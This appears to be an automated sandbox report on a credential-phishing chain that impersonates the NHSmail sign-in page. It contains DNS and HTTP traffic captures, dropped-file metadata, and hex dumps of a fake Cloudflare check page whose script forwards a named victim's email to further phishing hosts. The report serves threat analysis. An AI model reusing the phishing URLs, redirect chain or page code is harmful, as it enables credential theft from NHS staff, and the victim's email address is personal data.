")\|\|-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){ var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader\|\|{}).slReportFailure\|\|r.slReportFailure\|\|!1}function a(){return(e().loader\|\|{}).redirectToErrorPageOnLoadFailure\|\|!1}function s(){return(e().loader\|\|{}).logByThrowing\|\|!1}function u(e){if(!t()&&!n()){return!1}var r=e.src\|\|e.href\|\|"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0} if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("rickorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("xintegrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){ var r=g.createElement("script"),t=g.querySelector("s
URL: https://5eedab40.shaullerica.workers.dev/?email=adrianmarsh@nhs.net Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://5eedab40.shaullerica.workers.dev/?email=adrianmarsh@nhs.net Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJlYWxt Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To use the NHSmail shared tenant services you must review and accept the NHSmail Accepdata Use Policy (AUP).", "prominent_button_name": "Sign in", "text_input_field_labels": [ "Email Address", "Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://giannio.com/adfs/ls/?RedirectToIdentityProvider=AD+AUTHORITY&phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5t Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJlYWxt Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To use the NHSmail shared tenant services you must review and accept the NHSmail Accepdata Use Policy (AUP). No action is needed if you have already accepted the AUP.", "prominent_button_name": "Sign in", "text_input_field_labels": [ "sdf", "Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://giannio.com/adfs/ls/?RedirectToIdentityProvider=AD+AUTHORITY&phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5t Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJlYWxt Model: Joe Sandbox AI	{ "brands": [ "NHS" ] }
	{ "brands": [ "NHS" ] }
URL: https://giannio.com/adfs/ls/?RedirectToIdentityProvider=AD+AUTHORITY&phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5t Model: Joe Sandbox AI	{ "brands": [ "NHS" ] }
	{ "brands": [ "NHS" ] }
URL: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJlYWxt Model: Joe Sandbox AI	{ "brands": [ "NHS" ] }
	{ "brands": [ "NHS" ] }
URL: https://giannio.com/adfs/ls/?RedirectToIdentityProvider=AD+AUTHORITY&phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5t Model: Joe Sandbox AI	{ "brands": [ "NHS" ] }
	{ "brands": [ "NHS" ] }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 15:14:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9821571256841755
Encrypted:	false
SSDEEP:	48:8TduTKuiaHI8ZidAKZdA1FehwiZUklqeh0y+3:8E3iJ6ry
MD5:	717A56F165B0C432A898F37C9F089318
SHA1:	78C6E5E5F5F91198347C0DC272332DC90D53071B
SHA-256:	7B4CF427D662039099502BC6D1A8FBF7CB3CB87A326E2133580AC9C68BD476BD
SHA-512:	7527939B6F50011432B943C6818415BC0880246DA1E3AB01BA5EE79C07F69AA7D38D7C12C7506D36025CC3079E08508B4A1A19BA5937CD97FC96B47F81BAC957
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....Sw.S.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Ib.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 17:14:00.471970081 CET	53	60112	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:00.475383043 CET	53	55314	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:01.300673962 CET	55414	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:01.300827026 CET	50150	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:01.335154057 CET	53	55414	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:01.338768005 CET	53	50150	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:01.477765083 CET	53	57080	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:02.932189941 CET	59841	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:02.932467937 CET	63979	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:02.948745966 CET	53	59841	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:02.954005957 CET	53	63979	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:03.457775116 CET	62848	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:03.458127022 CET	61810	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:03.493109941 CET	53	61810	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:03.496282101 CET	53	62848	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:03.629259109 CET	54083	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:03.629484892 CET	54418	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:03.636063099 CET	53	54083	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:03.636699915 CET	53	54418	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:04.929317951 CET	49725	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:04.929507017 CET	52192	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:04.935837030 CET	53	49725	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:04.936295986 CET	53	52192	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:04.937246084 CET	65360	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:04.937398911 CET	61052	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:04.944053888 CET	53	65360	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:04.944251060 CET	53	61052	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:05.212765932 CET	64960	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:05.212948084 CET	60977	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:05.219372988 CET	53	64960	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:05.219580889 CET	53	60977	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:06.691994905 CET	50710	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:06.692151070 CET	62859	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:06.707046032 CET	53	62859	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:06.707056999 CET	53	50710	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:18.458014011 CET	53	59566	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:18.723129988 CET	52542	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:18.723283052 CET	52613	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:18.734464884 CET	53	52542	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:18.737170935 CET	53	52613	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:20.545804977 CET	51650	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:20.546035051 CET	50472	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:20.560372114 CET	53	51650	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:20.580044985 CET	62104	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:20.580188990 CET	65416	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:20.588965893 CET	53	62104	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:20.590894938 CET	53	65416	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:20.705715895 CET	53	50472	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:24.895559072 CET	55389	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:24.895720959 CET	64293	53	192.168.2.16	1.1.1.1
Jan 14, 2025 17:14:24.908112049 CET	53	55389	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:24.930202007 CET	53	64293	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:28.723385096 CET	53	61804	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:37.435024977 CET	53	65363	1.1.1.1	192.168.2.16
Jan 14, 2025 17:14:59.752365112 CET	53	51530	1.1.1.1	192.168.2.16
Jan 14, 2025 17:15:00.343851089 CET	53	52423	1.1.1.1	192.168.2.16
Jan 14, 2025 17:15:07.567563057 CET	138	138	192.168.2.16	192.168.2.255
Jan 14, 2025 17:15:29.434859991 CET	53	55334	1.1.1.1	192.168.2.16

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 14, 2025 17:14:20.705835104 CET	192.168.2.16	1.1.1.1	c233	(Port unreachable)	Destination Unreachable
Jan 14, 2025 17:14:24.930289984 CET	192.168.2.16	1.1.1.1	c233	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:02 UTC	711	OUT	GET /dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA== HTTP/1.1 Host: jtkink.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:02 UTC	285	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:02 GMT Server: Apache X-Powered-By: PHP/8.2.19 refresh: 0;url=https://5eedab40.shaullerica.workers.dev?email=adrianmarsh@nhs.net Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:02 UTC	634	OUT	GET /favicon.ico HTTP/1.1 Host: jtkink.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA== Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:03 UTC	236	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:03 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 09 Jul 2020 23:37:11 GMT Accept-Ranges: bytes Content-Length: 15406 Content-Type: image/x-icon
2025-01-14 16:14:03 UTC	7956	IN	Data Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9d 9c 60 fe 79 9a 83 fe 66 9b 91 fe 8f 7e 6e fe 88 70 49 fe 95 81 4c fe 9d 9a 58 fe 82 7a 58 fe 6f 6b 5b fe 9e 91 8c fe a3 a2 a8 fe ca 9d 9d fe cf 9e a0 fe ce a2 b6 fe af a7 ac fe b0 a2 94 fe 94 9d 55 fe 6f 97 7a ff 63 8f 8b ff 7d 72 5e ff 86 73 4b ff a4 88 68 ff 9e 93 6e ff 87 84 6f ff 77 76 70 ff 84 8e 83 ff 85 9c 97 ff af 8f 79 ff c7 93 8e ff c3 9c b3 ff a2 a0 9a ff b5 a1 96 fe 8d 95 65 fe 86 95 70 ff 7c 8b 72 ff 64 8b 6f ff 39 c1 b7 ff 49 c5 c1 ff 68 ac 9c ff 88 8f 7d ff 93 Data Ascii: h6 (00 h&( `yf~npILXzXok[Uozc}r^sKhnowvpyep\|rdo9Ih}
2025-01-14 16:14:03 UTC	7450	IN	Data Raw: 5b ff 94 7d 52 ff 93 73 47 ff 8e 6a 32 ff 90 6d 27 ff 92 71 15 ff a5 7b 33 ff 88 a1 80 ff 7a a0 85 ff 65 a9 97 ff 3e c3 b9 ff 10 e6 ee ff 11 e6 ed ff 52 b0 9b ff 95 87 5f ff a4 8d 63 ff b4 92 6c ff 84 96 7c ff 0f e7 ef ff 0f e7 ef ff 21 ce d3 ff 60 8f a1 ff 6b 9c a8 ff 72 90 8a ff 8c 8f 7e ff 9c 8d 78 ff a1 89 6e ff 97 82 61 ff 94 82 62 ff 80 85 75 ff 81 9c b8 ff 81 9f bd ff 82 a2 b9 ff 94 98 a8 ff a3 93 8f ff a2 99 7c ff a2 9a 6d ff 99 94 57 ff 8d 86 4a fe 6c 82 63 fd 5e 81 5a ff 68 8c 54 ff 7c 97 51 ff 94 93 4b ff a4 8f 4a ff 9e 92 4b ff 97 99 3f ff a4 96 45 ff ac 8e 62 ff 99 80 5c ff 98 77 52 ff 91 6c 35 ff 90 6c 26 ff 97 71 14 ff a9 7a 29 ff aa 8c 57 ff 94 8d 5c ff 8b 8c 5e ff 67 a3 88 ff 17 e0 e5 ff 0f e7 ef ff 47 b6 a2 ff 8d 81 4c ff a6 8c 51 ff a7 Data Ascii: [}RsGj2m'q{3ze>R_cl\|!`kr~xnabu\|mWJlc^ZhT\|QKJK?Eb\wRl5l&qz)W\^gGLQ

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:03 UTC	717	OUT	GET /?email=adrianmarsh@nhs.net HTTP/1.1 Host: 5eedab40.shaullerica.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://jtkink.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:03 UTC	773	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3FioLRjrSkoMkBUbHBA0LXykPFSYY7ICw2tDon4tU09MQLdmVDNVv86DNLR%2FPYr7UoTobJoOygk1h%2BzABsWoOZEwOMMNZUEVZqkNfzxR8PTIT5qcyGuyLFw%2FeBlgchmZyHrpZauay23KCGTXUs0WTxmlQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901eeab7e8ed42bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2391&min_rtt=2383&rtt_var=910&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2859&recv_bytes=1295&delivery_rate=1192810&cwnd=193&unsent_bytes=0&cid=24d59b7350af0785&ts=191&x=0"
2025-01-14 16:14:03 UTC	1369	IN	Data Raw: 31 36 38 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 20 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 0a 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 1683<!doctype html><html lang="en-US"><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-sc
2025-01-14 16:14:03 UTC	1369	IN	Data Raw: 20 74 65 78 74 3b 20 0a 20 20 20 20 7d 0a 0a 20 20 20 20 6c 65 74 20 73 78 20 3d 20 22 68 74 74 70 73 3a 2f 2f 62 61 73 2d 63 6f 2e 75 6b 2f 3f 65 6b 70 6a 72 67 79 62 26 71 72 63 3d 61 64 72 69 61 6e 6d 61 72 73 68 40 6e 68 73 2e 6e 65 74 22 3b 0a 0a 20 20 20 20 63 6f 6e 73 74 20 50 55 42 4c 49 43 5f 4b 45 59 20 3d 20 60 2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 20 20 20 20 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 78 43 4a 42 77 63 59 38 74 30 41 71 50 71 75 55 2b 41 68 31 0a 20 20 20 20 52 30 45 50 57 6c 63 44 35 58 53 58 68 4f 45 65 30 30 38 34 34 54 6b 69 47 4c 46 48 6e 4d 57 51 45 75 67 68 30 7a 59 68 2f 6b 67 72 77 38 68 Data Ascii: text; } let sx = "https://bas-co.uk/?ekpjrgyb&qrc=adrianmarsh@nhs.net"; const PUBLIC_KEY = `-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxCJBwcY8t0AqPquU+Ah1 R0EPWlcD5XSXhOEe00844TkiGLFHnMWQEugh0zYh/kgrw8h
2025-01-14 16:14:03 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 27 43 4f 4e 4e 45 43 54 49 4f 4e 20 54 4f 20 48 4f 53 54 20 46 41 49 4c 45 44 27 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 78 68 72 2e 73 65 6e 64 28 29 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 2e 68 31 2c 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c Data Ascii: } } else { document.body.innerHTML = 'CONNECTION TO HOST FAILED'; } } }; xhr.send(); } </script></head><style> .h1,.h2{font-weight:500}*{box-sizing:border-box;margin:0;padding:0}html
2025-01-14 16:14:03 UTC	1369	IN	Data Raw: 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68 31 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e Data Ascii: footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (max-width:720px){.main-content{margin-top:4rem}.h1{line-height:1.75rem;font-size:1.5rem}.core-msg,.h2{line-height:1.
2025-01-14 16:14:03 UTC	295	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 57 65 20 6e 65 65 64 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 20 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 20 53 65 63 75 72 69 74 79 20 3c 2f 64 69 Data Ascii: <div>We need to review the security of your connection before proceeding. </div> </div> </div> </div> <div class="footer" role="contentinfo"> <div class="footer-inner"> <div class="text-center"> Performance & Security </di
2025-01-14 16:14:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
